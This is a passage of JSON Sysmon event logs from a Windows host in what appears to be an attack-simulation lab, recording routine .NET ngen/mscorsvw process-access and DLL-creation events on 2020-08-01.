08:07:01.069","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22A5-5F25-0000-001011241000}","TargetProcessId":"2704","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:01","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8098,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:07:01.084\r\nProcessGuid: {41C8662E-22A5-5F25-0000-001011241000}\r\nProcessId: 2704\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\a90-0\\System.Web.Abstractions.dll\r\nCreationUtcTime: 2020-08-01 08:07:01.084","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:07:01.084","ProcessGuid":"{41C8662E-22A5-5F25-0000-001011241000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\a90-0\\System.Web.Abstractions.dll","CreationUtcTime":"2020-08-01 08:07:01.084","EventReceivedTime":"2020-08-01 08:07:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:01","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8099,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:01.115\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22A5-5F25-0000-00105D271000}\r\nTargetProcessId: 4932\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:01.115","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22A5-5F25-0000-00105D271000}","TargetProcessId":"4932","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:01","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8100,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:01.115\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22A5-5F25-0000-00105D271000}\r\nTargetProcessId: 4932\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:01.115","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22A5-5F25-0000-00105D271000}","TargetProcessId":"4932","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:01","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8101,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:01.131\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22A5-5F25-0000-00105D271000}\r\nTargetProcessId: 4932\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:01.131","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22A5-5F25-0000-00105D271000}","TargetProcessId":"4932","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:01","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8102,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:01.162\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22A5-5F25-0000-0010A72A1000}\r\nTargetProcessId: 4372\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:01.162","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22A5-5F25-0000-0010A72A1000}","TargetProcessId":"4372","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:01","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8103,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:01.162\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22A5-5F25-0000-0010A72A1000}\r\nTargetProcessId: 4372\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:01.162","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22A5-5F25-0000-0010A72A1000}","TargetProcessId":"4372","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:01","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8104,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:01.162\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22A5-5F25-0000-0010A72A1000}\r\nTargetProcessId: 4372\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:01.162","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22A5-5F25-0000-0010A72A1000}","TargetProcessId":"4372","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:01","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8105,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:07:01.225\r\nProcessGuid: {41C8662E-22A5-5F25-0000-0010A72A1000}\r\nProcessId: 4372\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1114-0\\System.Web.ApplicationServices.dll\r\nCreationUtcTime: 2020-08-01 08:07:01.225","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:07:01.225","ProcessGuid":"{41C8662E-22A5-5F25-0000-0010A72A1000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1114-0\\System.Web.ApplicationServices.dll","CreationUtcTime":"2020-08-01 08:07:01.225","EventReceivedTime":"2020-08-01 08:07:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:01","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8106,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:01.256\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22A5-5F25-0000-0010362E1000}\r\nTargetProcessId: 3056\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 